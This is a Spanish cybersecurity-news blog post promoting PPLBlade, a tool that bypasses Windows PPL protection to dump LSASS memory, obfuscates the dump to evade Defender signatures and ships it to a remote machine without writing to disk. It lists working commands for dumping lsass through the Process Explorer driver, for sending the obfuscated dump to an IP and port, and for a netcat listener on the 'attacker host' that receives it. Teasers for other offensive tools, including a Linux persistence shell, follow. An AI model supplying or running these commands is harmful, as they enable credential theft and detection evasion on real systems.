PPLBlade: Herramienta de Volcado de Proceso Protegido

por Pablo Álvarez Corredera
Noticias sobre ciberseguridad, hackeos, hacking y malware

Herramienta de Volcado de Proceso Protegido que soporta ofuscar el volcado de memoria y transferirlo a estaciones de trabajo remotas sin dejarlo en el disco.

NOTA IMPORTANTE: Este contenido es compartido exclusivamente con la concepción de usarse como medida de seguridad y avances de hacking ético.

Funcionalidades clave:

  • Bypass de la protección PPL
  • Ofuscar archivos de volcado de memoria para evadir mecanismos de detección basados en firmas de Defender
  • Subir volcado de memoria con métodos de carga RAW y SMB sin dejarlo en el disco (volcado sin archivos)

Para obtener una visión general de las técnicas utilizadas en esta herramienta, visite: Bypassing Defenders – LSASS Dump Detection and PPL Protection in Go

Debes tener en cuenta que PROCEXP15.SYS se menciona en los archivos fuente con fines de compilación. No es necesario transferirlo a la máquina objetivo junto con PPLBlade.exe. Ya está integrado en PPLBlade.exe. El exploit es simplemente un ejecutable único.

Modos:

  • Dump: Volcar memoria del proceso usando PID o Nombre del Proceso
  • Decrypt: Revertir el archivo de volcado ofuscado (–obfuscate) a su estado original
  • Cleanup: Realizar la limpieza manualmente en caso de algún problema en la ejecución (tenga en cuenta que los valores de las opciones deben ser los mismos que los de la ejecución que estamos intentando limpiar)
  • DoThatLsassThing: Volcar lsass.exe usando el controlador de Process Explorer (POC básico)
RELACIONADOS:  EmploLeaks: Herramienta OSINT para Detectar Miembros de una Empresa con Credenciales Filtradas

Modos de Manejo:

  • Direct: Abre un handle PROCESS_ALL_ACCESS directamente, utilizando la función OpenProcess()
  • Procexp: Utiliza PROCEXP152.sys para obtener un handle

Ejemplos:

POC básico que utiliza PROCEXP152.sys para volcar lsass:

PPLBlade.exe --mode dothatlsassthing

(Tenga en cuenta que no realiza el XOR del archivo de volcado, proporcione una bandera adicional de obfuscate para habilitar la funcionalidad XOR)

Subir el volcado LSASS ofuscado a una ubicación remota:

PPLBlade.exe --mode dump --name lsass.exe --handle procexp --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

Host atacante:

nc -lnp 1234 > lsass.dmp
python3 deobfuscate.py --dumpname lsass.dmp

Desofuscar el volcado de memoria:

PPLBlade.exe --mode descrypt --dumpname PPLBlade.dmp --key PPLBlade

Descargar PPLBlade

Relacionado

Bugsy: Herramienta de Interfaz de Línea de Comando que Proporciona Remedios Automáticos para Vulnerabilidades

Bugsy es una herramienta de interfaz de línea de comandos (CLI) que ofrece remedios automáticos para vulnerabilidades de seguridad en tu código. Se trata de la edición comunitaria de Mobb, la primera herramienta de remediación automática de vulnerabilidades de seguridad sin proveedor específico. Bugsy está diseñado para ayudar a los desarrolladores a identificar y solucionar rápidamente las vulnerabilidades de seguridad en su código. ¿Qué es Mobb? ¡SEGUIR LEYENDO!

RELACIONADOS:  Bugsy: Herramienta de Interfaz de Línea de Comando que Proporciona Remedios Automáticos para Vulnerabilidades
CATSploit: Una Herramienta de Pruebas de Penetración Automatizada Utilizando la Evaluación de Técnicas de Ataque Cibernético (CATS)

CATSploit es una herramienta automatizada de pruebas de penetración que utiliza el método de Evaluación de Técnicas de Ataque Cibernético (CATS). A diferencia de los pentesters tradicionales, CATSploit utiliza información de configuración del sistema, como el sistema operativo, puertos abiertos y versiones de software recopiladas por el escáner, para calcular valores de puntuación de captura (eVc) y detectabilidad (eVd) de cada técnica de ataque para el ¡SEGUIR LEYENDO!

17 Mejores Cursos Gratis de Comercio Electrónico

Cursos con los que aprender a montar una tienda o comercio electrónico sobre una página web, totalmente gratis y online.

28 Cursos Gratis de Udemy (cupón finalizado)

Cursos variados, entre los que vas a poder aprender Javascript, NET, Python, Java, R, AWS, SQL, Linux y más. Juegos Gratis de Abril: Steel Rats ? JUEGO GRATIS STEAM > World's Dawn ? JUEGO INDIE GALA > Age of Steel Recharge ? JUEGO INDIE GALA > Dwarflings ? JUEGO INDIE GALA > Survivalist ? JUEGO INDIE GALA Cursos en Español Curso Gratuito Iniciacion a la programacion ¡SEGUIR LEYENDO!

RELACIONADOS:  WebCopilot: Automatizando la Enumeración de Subdominios y Escaneo de Vulnerabilidades
Mejores Cursos Gratis de Seguridad en Red

Recopilatorio de cursos enfocados en aprender seguridad dentro del mundo de la red, internet y entre las conexiones de las redes.

Demonized Shell: Una Herramienta Avanzada para Persistencia en Linux

D3m0n1z3dShell es una herramienta avanzada diseñada para lograr persistencia en sistemas Linux. NOTA IMPORTANTE: Es importante tener en cuenta que no me hago responsable de los daños causados por esta herramienta. Se debe utilizar de manera inteligente y únicamente con fines educativos. Desarrollada por MatheuZSecurity, esta shell demonizada ofrece una variedad de características para asegurar la persistencia en diversos entornos, desde sistemas Linux hasta Android e ¡SEGUIR LEYENDO!

EasyEASM: Herramienta de Gestión de Superficie de Ataque de Cero Dólares

Herramienta de gestión de superficie de ataque de cero dólares presentada en Black Hat Arsenal 2023 y Recon Village @ DEF CON 2023. Easy EASM es exactamente eso... la herramienta más fácil de configurar para proporcionar visibilidad a su organización sobre sus activos externos. La industria está dominada por proveedores de $30,000 que venden "Gestión de Superficie de Ataque", pero los cazadores de recompensas y los ¡SEGUIR LEYENDO!

Salir de la versión móvil